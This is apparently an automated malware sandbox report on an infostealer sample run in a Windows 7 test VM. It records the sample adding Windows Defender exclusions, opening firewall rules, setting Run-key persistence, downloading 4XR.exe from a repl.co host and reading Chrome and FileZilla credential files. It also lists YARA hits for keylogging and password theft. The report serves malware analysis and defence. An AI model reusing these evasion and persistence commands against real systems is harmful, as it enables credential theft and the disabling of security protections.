Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6403_us | Aug. 1, 2023, 8:01 a.m. | Aug. 1, 2023, 8:04 a.m. |
-
-
-
-
-
-
nslookup.exe nslookup myip.opendns.com. resolver1.opendns.com
2472
-
-
-
WMIC.exe wmic ComputerSystem get Domain
2568
-
-
powershell.exe Powershell -Command 'Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\C3.exe"'
2672 -
powershell.exe Powershell -Command 'Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\ratt.exe"'
2796 -
powershell.exe Powershell -Command 'Add-MpPreference -ExclusionPath "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\C3.exe"'
2884 -
7z.exe 7z.exe x -o"C:\Users\test22\AppData\Local\Temp" -y C3.7z
2964 -
-
-
-
-
-
-
powershell.exe Powershell -Command 'Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\4.zip"'
1176 -
powershell.exe Powershell -Command 'Add-MpPreference -ExclusionPath "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\4.zip"'
2860 -
7z.exe 7z.exe x -o"C:\Users\test22\AppData\Local\Temp" -y 4.zip
2148 -
-
netsh.exe "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=in action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\C3.exe" enable=yes
1712 -
netsh.exe "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=out action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\C3.exe" enable=yes
1476 -
-
WMIC.exe wmic computersystem where name="TEST22-PC" set AutomaticManagedPagefile=False
200
-
-
-
WMIC.exe wmic pagefileset where name="C:\\pagefile.sys" set InitialSize=15000,MaximumSize=20000
1668
-
-
C3.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\C3.exe"
3060 -
attrib.exe "C:\Windows\system32\attrib.exe" +h "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\C3.exe"
2552
-
-
reg.exe REG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "4" /t REG_SZ /d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\4.exe" /F
204 -
4.exe "4.exe"
2468
-
-
-
-
-
-
-
-
netsh.exe "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=in action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\C3.exe" enable=yes
2524 -
netsh.exe "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=out action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\C3.exe" enable=yes
2824 -
-
WMIC.exe wmic computersystem where name="TEST22-PC" set AutomaticManagedPagefile=False
2992
-
-
-
WMIC.exe wmic pagefileset where name="C:\\pagefile.sys" set InitialSize=15000,MaximumSize=20000
840
-
-
attrib.exe "C:\Windows\system32\attrib.exe" +h "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\C3.exe"
2728
-
-
reg.exe REG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "C3" /t REG_SZ /d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\C3.exe" /F
2684
-
-
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
api.ip.sb | 104.26.13.31 | |
myip.opendns.com | ||
yello9erylanguage.gromovananii199.repl.co | 35.186.245.55 | |
resolver1.opendns.com | 208.67.222.222 | |
222.222.67.208.in-addr.arpa |
PTR
dns.umbrella.com
PTR
dns.opendns.com
PTR
resolver1.opendns.com
|
|
myip.opendns.com |
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.103:49200 104.26.13.31:443 |
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 | C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | 53:56:0b:3a:91:49:7f:18:59:87:21:98:d3:7f:98:0b:b4:ae:cb:cc |
TLS 1.2 192.168.56.103:49210 35.186.245.55:443 |
C=US, O=Google Trust Services LLC, CN=GTS CA 1P5 | CN=gromovananii199.repl.co | 36:65:d3:d8:40:79:65:2a:c8:25:78:9d:48:cd:44:6a:65:4d:cb:c0 |
pdb_path | D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb |
file | C:\Program Files (x86)\Google\Chrome\Application\chrome.exe |
file | C:\Program Files\Mozilla Firefox\firefox.exe |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome |
section | .didat |
resource name | PNG |
suspicious_features | GET method with no useragent header | suspicious_request | GET https://api.ip.sb/geoip | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET https://yello9erylanguage.gromovananii199.repl.co/4XR.exe |
request | GET https://api.ip.sb/geoip |
request | GET https://yello9erylanguage.gromovananii199.repl.co/4XR.exe |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies |
file | C:\Users\test22\AppData\Local\Temp\4.exe |
file | C:\Users\test22\AppData\Local\Temp\C3.exe |
file | C:\Users\test22\AppData\Local\Temp\7z.exe |
file | C:\Users\test22\AppData\Local\Temp\C3.bat |
file | C:\Users\test22\AppData\Local\Temp\12.bat |
file | C:\Users\test22\AppData\Local\Temp\Add.ps1 |
file | C:\Users\test22\AppData\Local\Temp\vbs.vbs |
file | C:\Users\test22\AppData\Local\Temp\7z.dll |
file | C:\Users\test22\AppData\Local\Temp\4XR.exe |
file | C:\Users\test22\AppData\Local\Temp\HSTART.bat |
file | C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
cmdline | C:\Windows\system32\cmd.exe /c nslookup myip.opendns.com. resolver1.opendns.com |
cmdline | Powershell -Command 'Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\C3.exe"' |
cmdline | wmic pagefileset where name="C:\\pagefile.sys" set InitialSize=15000,MaximumSize=20000 |
cmdline | wmic computersystem where name="TEST22-PC" set AutomaticManagedPagefile=False |
cmdline | Powershell -Command 'Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\ratt.exe"' |
cmdline | Powershell -Command 'Add-MpPreference -ExclusionPath "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\C3.exe"' |
cmdline | "C:\Windows\system32\cmd.exe" |
cmdline | C:\Windows\system32\cmd.exe /c wmic ComputerSystem get Domain |
cmdline | powershell -executionpolicy RemoteSigned -WindowStyle Hidden -file Add.ps1 |
cmdline | wmic ComputerSystem get Domain |
cmdline | Powershell -Command 'Add-MpPreference -ExclusionPath "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\4.zip"' |
cmdline | Powershell -Command 'Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\4.zip"' |
file | C:\Users\test22\AppData\Local\Temp\HSTART.bat |
file | C:\Users\test22\AppData\Local\Temp\vbs.vbs |
file | C:\Users\test22\AppData\Local\Temp\7z.exe |
file | C:\Users\test22\AppData\Local\Temp\C3.exe |
file | C:\Users\test22\AppData\Local\Temp\4XR.exe |
file | C:\Users\test22\AppData\Local\Temp\4.exe |
file | C:\Users\test22\AppData\Local\Temp\4XR.exe |
file | C:\Users\test22\AppData\Local\Temp\7z.dll |
file | C:\Users\test22\AppData\Local\Temp\C3.exe |
file | C:\Users\test22\AppData\Local\Temp\7z.exe |
wmi | SELECT * FROM Win32_ComputerSystem WHERE name="TEST22-PC" |
wmi | SELECT Domain FROM Win32_ComputerSystem |
wmi | SELECT * FROM Win32_PageFileSetting WHERE name="C:\\pagefile.sys" |
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | Create a windows service | rule | Create_Service | ||||||
description | Communications over RAW Socket | rule | Network_TCP_Socket | ||||||
description | Communications over P2P network | rule | Network_P2P_Win | ||||||
description | Communication using DGA | rule | Network_DGA | ||||||
description | Steal credential | rule | local_credential_Steal | ||||||
description | Match Windows Http API call | rule | Str_Win32_Http_API | ||||||
description | Escalate priviledges | rule | Escalate_priviledges | ||||||
description | PWS Memory | rule | Generic_PWS_Memory_Zero | ||||||
description | Record Audio | rule | Sniff_Audio | ||||||
description | Communications over HTTP | rule | Network_HTTP | ||||||
description | Communications use DNS | rule | Network_DNS | ||||||
description | Take ScreenShot | rule | ScreenShot | ||||||
description | Code injection with CreateRemoteThread in a remote process | rule | Code_injection | ||||||
description | Match Windows Inet API call | rule | Str_Win32_Internet_API | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerCheck__RemoteAPI | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | DebuggerException__ConsoleCtrl | ||||||
description | (no description) | rule | DebuggerException__SetConsoleCtrl | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | (no description) | rule | Check_Dlls | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Anti-Sandbox checks for ThreatExpert | rule | antisb_threatExpert | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | Affect hook table | rule | win_hook | ||||||
description | Win32 PWS Loki | rule | Win32_PWS_Loki_m_Zero | ||||||
description | Communications over FTP | rule | Network_FTP | ||||||
description | Run a KeyLogger | rule | KeyLogger | ||||||
description | File Downloader | rule | Network_Downloader | ||||||
description | Create a windows service | rule | Create_Service | ||||||
description | Communications over RAW Socket | rule | Network_TCP_Socket | ||||||
description | Communications over P2P network | rule | Network_P2P_Win | ||||||
description | Communication using DGA | rule | Network_DGA | ||||||
description | Steal credential | rule | local_credential_Steal | ||||||
description | Match Windows Http API call | rule | Str_Win32_Http_API | ||||||
description | Escalate priviledges | rule | Escalate_priviledges | ||||||
description | PWS Memory | rule | Generic_PWS_Memory_Zero | ||||||
description | Record Audio | rule | Sniff_Audio | ||||||
description | Communications over HTTP | rule | Network_HTTP |
cmdline | "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=in action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\C3.exe" enable=yes |
cmdline | C:\Windows\system32\cmd.exe /c nslookup myip.opendns.com. resolver1.opendns.com |
cmdline | wmic pagefileset where name="C:\\pagefile.sys" set InitialSize=15000,MaximumSize=20000 |
cmdline | wmic computersystem where name="TEST22-PC" set AutomaticManagedPagefile=False |
cmdline | "C:\Windows\system32\attrib.exe" +h "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\C3.exe" |
cmdline | REG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "4" /t REG_SZ /d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\4.exe" /F |
cmdline | C:\Windows\system32\cmd.exe /c wmic ComputerSystem get Domain |
cmdline | wmic ComputerSystem get Domain |
cmdline | REG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "C3" /t REG_SZ /d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\C3.exe" /F |
cmdline | "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=out action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\C3.exe" enable=yes |
cmdline | nslookup myip.opendns.com. resolver1.opendns.com |
wmi | SELECT * FROM Win32_ComputerSystem WHERE name="TEST22-PC" |
wmi | SELECT Domain FROM Win32_ComputerSystem |
host | 94.131.105.161 |
description | C3.exe tried to sleep 8184579 seconds, actually delayed analysis time by 8184579 seconds |
reg_key | HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\C3 | reg_value | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\C3.exe | ||||||
reg_key | HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\4 | reg_value | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\4.exe |
cmdline | "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=in action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\C3.exe" enable=yes |
cmdline | "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=out action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\C3.exe" enable=yes |
file | C:\Users\test22\AppData\Roaming\FileZilla\sitemanager.xml |
file | C:\Users\test22\AppData\Roaming\FileZilla\recentservers.xml |